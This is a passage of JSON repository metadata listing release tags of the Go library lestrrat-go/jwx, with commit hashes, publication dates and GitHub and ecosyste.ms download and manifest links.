m/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G